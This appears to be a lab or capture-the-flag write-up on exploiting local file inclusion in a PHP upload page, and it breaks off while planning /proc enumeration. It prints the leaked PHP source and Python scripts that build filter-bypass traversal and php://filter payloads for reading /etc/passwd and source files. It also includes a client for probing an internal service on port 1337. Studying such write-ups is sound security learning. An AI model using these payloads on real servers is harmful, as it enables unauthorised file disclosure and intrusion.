File Upload Feature
An interesting beta page that allows file uploads.
However, uploading a file produces no useful reply from the server. I also do not know whether my uploads are stored somewhere on the server or processed in some way.
To learn more, perhaps the page is vulnerable to LFI? The format of the URL (index.php?page=...) looks very suspicious.
Local File Inclusion
Trying out the usual /etc/passwd, I managed to get something juicy. This confirms that the page is vulnerable to LFI!
Now it is time to leak the source code of the web pages. Using the same method, we can leak the PHP source of index.php and activate_license.php (the latter is used during the file upload).
index.php:
<?php
// Strips "../" and "./" once each (single pass, not recursive), so a
// crafted string can still collapse to "../" after both replacements.
function sanitize_input($param) {
    $param1 = str_replace("../","",$param);
    $param2 = str_replace("./","",$param1);
    return $param2;
}
$page = $_GET['page'];
if (isset($page) && preg_match("/^[a-z]/", $page)) {
    $page = sanitize_input($page);
} else {
    // No exit() after header(): execution falls through to readfile()
    // with the raw, unsanitized value.
    header('Location: /index.php?page=default.html');
}
readfile($page);
?>

activate_license.php:
<?php
if(isset($_FILES['licensefile'])) {
    $license = file_get_contents($_FILES['licensefile']['tmp_name']);
    $license_size = $_FILES['licensefile']['size'];
    // Forward the upload to a backend listening on localhost:1337
    $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
    if (!$socket) { echo "error socket_create()\n"; }
    if (!socket_connect($socket, '127.0.0.1', 1337)) {
        echo "error socket_connect()" . socket_strerror(socket_last_error()) . "\n";
    }
    // "N" = unsigned 32-bit big-endian length prefix, then the raw file bytes
    socket_write($socket, pack("N", $license_size));
    socket_write($socket, $license);
    // Nothing is read back, so any reply from the backend never reaches the user
    socket_shutdown($socket);
    socket_close($socket);
}
?>
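To make the LFI mechanics concrete, here is an added example (not code from the original writeup) that ports the index.php gate to Python and builds the two kinds of page values that get past it. Two things follow directly from the leaked source: str_replace() runs a single non-overlapping pass, so a chunk like `.....///` survives both replacements as `../`; and the else branch sends a Location header but never calls exit(), so readfile() still runs on the raw value and the file contents end up in the body of the 302 response. The `a/` directory prefix used in the traversal payload is a hypothetical placeholder that must name an existing directory under the web root, because the kernel resolves it before applying the `..` steps; `php://filter` is assumed to be available to readfile(), as on a stock PHP build. The base64 string in the test is constructed.

```python
import base64
import re

# Port of sanitize_input() from the leaked index.php. Python's str.replace()
# has the same semantics as PHP's str_replace(): left to right,
# non-overlapping, and the result is never re-scanned.
def sanitize_input(param: str) -> str:
    return param.replace("../", "").replace("./", "")


def emulate_index(page: str):
    """Model what index.php does with ?page=...

    Returns (redirected, path_passed_to_readfile). When the regex fails the
    PHP sends a Location header but does not exit(), so readfile() still runs
    on the raw, unsanitized value.
    """
    if re.match(r"^[a-z]", page):
        return False, sanitize_input(page)
    return True, page


# Each chunk collapses in two steps:
#   ".....///" -> str_replace("../") -> "...//" -> str_replace("./") -> "../"
TRAVERSAL_CHUNK = ".....///"


def traversal_payload(prefix: str, depth: int, target: str) -> str:
    """Page value that starts with a letter (to satisfy the regex) and
    collapses to prefix + "../" * depth + target after sanitizing.

    prefix is hypothetical here: it has to be an existing directory under
    the web root, otherwise open() fails before the ".." steps apply.
    """
    return prefix + TRAVERSAL_CHUNK * depth + target


def filter_payload(path: str, b64: bool = False) -> str:
    """php://filter starts with 'p' and contains no dot-slash, so it reaches
    readfile() untouched. The base64 filter keeps the raw bytes of a PHP
    source file intact in the response (browsers hide <?php ... ?> when
    rendering the page otherwise)."""
    if b64:
        return "php://filter/convert.base64-encode/resource=" + path
    return "php://filter/resource=" + path


def decode_leaked_source(body: str) -> str:
    """Decode the body returned for a convert.base64-encode request."""
    return base64.b64decode(body.strip()).decode()


if __name__ == "__main__":
    for p in ("/etc/passwd",
              "a/../../etc/passwd",
              traversal_payload("a/", 2, "etc/passwd"),
              filter_payload("index.php", b64=True)):
        print(repr(p), "->", emulate_index(p))
```

The naive `a/../../etc/passwd` is neutralised to `a/etc/passwd`, while the chunked version reaches readfile() as `a/../../etc/passwd`; the wrapper form needs no tricks at all, which is why it is the usual way to pull PHP source through readfile().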
Internal Connection
The upload feature seems to forward the uploaded data to a socket listening on localhost port 1337, as a 4-byte big-endian length (pack("N", ...)) followed by the file contents. Pretty 1337!
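Added example, not part of the original writeup: a small Python client that speaks the same framing as activate_license.php, for talking to the listener directly once you have a foothold that can reach 127.0.0.1:1337. PHP's `pack("N", ...)` is an unsigned 32-bit big-endian integer, which is `struct.pack(">I", ...)` in Python. Unlike the PHP, which shuts down both directions without reading, this client only closes its write side and collects whatever the backend answers. The length field is taken as a separate argument so the declared length and the real body size can be chosen independently when probing how the listener handles a mismatch; the host, port and body in the `__main__` block are placeholders.

```python
import socket
import struct


def build_frame(body: bytes, declared_len=None) -> bytes:
    """Length-prefixed frame exactly as activate_license.php writes it:
    pack("N", size) then the raw bytes. declared_len defaults to len(body),
    which is what PHP sends since $_FILES[...]['size'] is measured by PHP."""
    n = len(body) if declared_len is None else declared_len
    return struct.pack(">I", n) + body


def parse_frame(buf: bytes):
    """Split one frame into (declared_len, body, remaining bytes), the way a
    backend on port 1337 would have to. Returns None when fewer than 4 header
    bytes are available; a declared length larger than the buffer simply
    yields a short body, which is exactly the case worth testing on the
    real listener."""
    if len(buf) < 4:
        return None
    (n,) = struct.unpack(">I", buf[:4])
    return n, buf[4:4 + n], buf[4 + n:]


def send_license(host: str, port: int, body: bytes,
                 declared_len=None, timeout: float = 5.0) -> bytes:
    """Send one frame and return everything the backend replies with."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_frame(body, declared_len))
        s.shutdown(socket.SHUT_WR)  # half-close: we still want to read
        chunks = []
        try:
            while True:
                c = s.recv(4096)
                if not c:
                    break
                chunks.append(c)
        except socket.timeout:
            pass
        return b"".join(chunks)


if __name__ == "__main__":
    # Placeholder target and body; run this from a shell on the box.
    print(send_license("127.0.0.1", 1337, b"LICENSE-TEST"))
```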
However, the lack of any output means that more enumeration is needed. Let's use /proc to discover the processes running on the system.